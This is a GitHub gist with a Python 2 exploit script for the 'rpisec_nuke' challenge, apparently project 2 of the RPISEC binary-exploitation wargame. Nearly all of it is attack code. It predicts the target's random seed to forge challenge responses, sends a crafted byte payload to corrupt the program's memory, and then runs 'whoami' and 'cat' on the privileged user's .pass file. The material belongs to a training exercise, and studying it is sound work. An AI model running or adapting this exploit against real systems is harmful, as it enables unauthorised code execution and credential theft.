This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# project 1 helper script | |
import subprocess | |
import binascii | |
import struct | |
import sys | |
import ctypes | |
import time | |
from operator import xor | |
def signThis(i): | |
return ctypes.c_int32(i).value | |
# function to read the file descriptor until it finds a string | |
def readuntil(fd, needle): | |
data = "" | |
while needle not in data: | |
data += fd.read(1) | |
return data | |
def dumpOutput(fd): | |
print "+---------------+" | |
print "|****DUMPING****|" | |
print "+---------------+" | |
while True: | |
sys.stdout.write(fd.read(1)) | |
def tohex(val, nbits): | |
return hex((val + (1 << nbits)) % (1 << nbits)) | |
def dots(x): | |
splitSize = 2 | |
ret = [x[i:i+splitSize] for i in range(0, len(x), splitSize)] | |
return '.'.join(ret) | |
def xorChallenges(first_challenge, challenge): | |
first_challenge = [''.join(x.split('.')) for x in first_challenge] | |
challenge = [''.join(x.split('.')) for x in challenge] | |
splitSize = 2 | |
for j in xrange(len(first_challenge)): | |
x = first_challenge[j] | |
first_challenge[j] = [x[i:i+splitSize] for i in range(0, len(x), splitSize)] | |
for j in xrange(len(challenge)): | |
x = challenge[j] | |
challenge[j] = [x[i:i+splitSize] for i in range(0, len(x), splitSize)] | |
# Xor all the values together | |
xored = [] | |
for j in xrange(len(challenge)): | |
x = challenge[j] | |
y = first_challenge[j] | |
xored.append([]) | |
for k in xrange(len(x)): | |
a = ctypes.c_ubyte(int(x[k],16)).value | |
b = ctypes.c_ubyte(int(y[k],16)).value | |
xoval = hex(ctypes.c_ubyte(a ^ b).value) | |
xored[j].append(xoval) | |
for i in xrange(len(xored)): | |
line = xored[i] | |
xored[i] = "".join(["00"[len(x[2:]):]+x[2:] for x in line]) | |
return xored | |
def findChallenge(cline, ctime, offset): | |
# Get our random numbers ( 4 needed ) | |
crand.seed_rand(ctime) | |
rNums = [] | |
for _ in xrange(offset): | |
crand.get_random() | |
for _ in xrange(4): | |
rNums.append(crand.get_random()) | |
# Get the integer values for xoring | |
cline = ''.join(cline.split('.')) | |
splitSize = 8 | |
words = [cline[i:i+splitSize] for i in range(0, len(cline), splitSize)] | |
# This flips for little endian | |
for wi in xrange(len(words)): | |
w = words[wi] | |
splitSize = 2 | |
words[wi] = ''.join([w[i:i+splitSize] for i in range(0, len(w), splitSize)[::-1]]) | |
intVals = [ signThis(int('0x'+x,16)) for x in words ] | |
# Xor all the values together | |
xored = [] | |
for i in range(4): | |
a = rNums[i] | |
b = intVals[i] | |
xored.append(ctypes.c_uint32(a ^ b).value) | |
# Turn the int values back to hex | |
xoredHex = [ tohex(x,32)[2:-1] for x in xored ] | |
# Pad those values with 0's for the memory | |
xoredHex = [ "00000000"[len(x):]+x for x in xoredHex ] | |
# Flip them for memory order | |
for xi in xrange(len(xoredHex)): | |
x = xoredHex[xi] | |
splitSize = 2 | |
xoredHex[xi] = ''.join([x[i:i+splitSize] for i in range(0, len(x), splitSize)[::-1]]) | |
cAns = ''.join(xoredHex) | |
#splitSize = 2 | |
#cAns = [cAns[i:i+splitSize] for i in range(0, len(cAns), splitSize)] | |
#cAns = '.'.join(cAns) | |
return cAns | |
# Import our rand seeder | |
crand = ctypes.cdll.LoadLibrary("./randlib.so") | |
crand.seed_rand(int(time.time())) | |
# run the project | |
#p = subprocess.Popen('nc warzone.rpis.ec 31337', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True) | |
#p = subprocess.Popen('/tmp/bleached/project2/rpisec_nuke', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True) | |
p = subprocess.Popen('strace /tmp/bleached/project2/rpisec_nuke', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True) | |
key2 = '00112233445566778899aabbccddeeff' | |
key3 = ['00112233000000000000000000000000', '00000000445566770000000000000000', '00000000000000008899aabb00000000', '000000000000000000000000ccddeeff'] | |
#key2 = '4e96e75bd2912e31f3234f6828a4a897' | |
#key3 = ['90357303000000000000000000000000', '00000000412ef8220000000000000000', '0000000000000000cd10e79800000000', '000000000000000000000000760491a6'] | |
############# | |
# Third Key # | |
############# | |
p.stdin.write("3\n") | |
session = int(readuntil(p.stdout, "]=---------=|").split('\n')[-1].split(' ')[4][7:-7]) | |
p.stdin.write(str(session)+"\n") | |
print readuntil(p.stdout, "CHALLENGE (64 Bytes):") | |
#GET CHALLENGE, GET TIME NOW | |
challenge = readuntil(p.stdout, "-------------------------------------------------------\n") | |
challenge = challenge.split("\n")[1:5] | |
challenge[0] = challenge[0][7:] | |
challenge = [l[30:] for l in challenge] | |
print readuntil(p.stdout, "TIME NOW:") | |
challenge_time = readuntil(p.stdout, "\n") | |
challenge_time = int(challenge_time.strip()[7:]) | |
# Get the seed | |
CLine = challenge[0] | |
seed = 0 | |
for x in range(50): | |
seed = ctypes.c_uint32(challenge_time + session - x).value | |
if findChallenge(CLine, seed,0) == "00000000000000000000000000000000": | |
break | |
offset = 4 | |
for x in xrange(4): | |
challenge[x%4] = findChallenge(challenge[x%4], seed, offset*4) | |
offset += 1 | |
# Finally xor with the first_challenge to get the leak | |
challenge = xorChallenges(key3, challenge) | |
challenge_input = ''.join(challenge) | |
p.stdin.write(challenge_input+"\n") | |
############## | |
# Second Key # | |
############## | |
p.stdin.write("2\n") | |
print readuntil(p.stdout, "ENTER AES-128 CRYPTO KEY:") | |
p.stdin.write(key2 + "\n") | |
print readuntil(p.stdout, "ENTER LENGTH OF DATA (16 OR 32):") | |
p.stdin.write("\n") | |
print readuntil(p.stdout, "DATA LENGTH SET TO") | |
p.stdin.write("\n") | |
print readuntil(p.stdout, "AUTHENTICATING") | |
p.stdin.write("\n") | |
############# | |
# First Key # | |
############# | |
p.stdin.write("1\n") | |
p.stdin.write("\x00\n") | |
p.stdin.write("\n") | |
print readuntil(p.stdout, "+-----------------------------------------------------+") | |
################### | |
# ON TO BOOM BOOM # | |
################### | |
p.stdin.write("4\n") | |
print readuntil(p.stdout, "READY") | |
# My Program | |
#program = "ADOOM\x00\x00\x00" # 8 bytes | |
program = "I"*132 + "S"+'A'+"IS"+'A'+"IS"+'A'+"IS"+'A'+"ISRISAISLIS ISDISOISOISMIADOOM\x00\x00\x00" | |
#program = "S"+'G'+"IS"+'E'+"IS"+'N'+"IS"+'E'+"ISRISAISLIS ISDISOISOISMIADOOM\x00\x00\x00" | |
#program = "I"*62 + "OIOIOIOI" | |
#program = "I"*132 + "S"+s[3]+"IS"+s[2]+"IS"+s[1]+"IS"+s[0]+"ISRISAISLIS ISDISOISOISMIADOOM\x00\x00\x00" | |
p.stdin.write(program*2) | |
p.stdin.write("\xa9\x59\xdc\xdc"+"\x4a\x00\x00\x00\x40\x45\x4e\x44\n") | |
p.stdin.write("\n") | |
p.stdin.write("CONFIRM\n") | |
dumpOutput(p.stdout) | |
print readuntil(p.stdout, "CYBER NUKE IS LAUNCHING") | |
print readuntil(p.stdout, "ATTEMPTING TO CONNECT TO UPLINK") | |
print readuntil(p.stdout, "EXECUTING...") | |
print readuntil(p.stdout, "MISSION SUCCESS") | |
# Got Root? | |
time.sleep(0.5) | |
p.stdin.write("whoami\n") | |
time.sleep(0.5) | |
p.stdin.write("cat /home/project2_priv/.pass\n") | |
dumpOutput(p.stdout) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment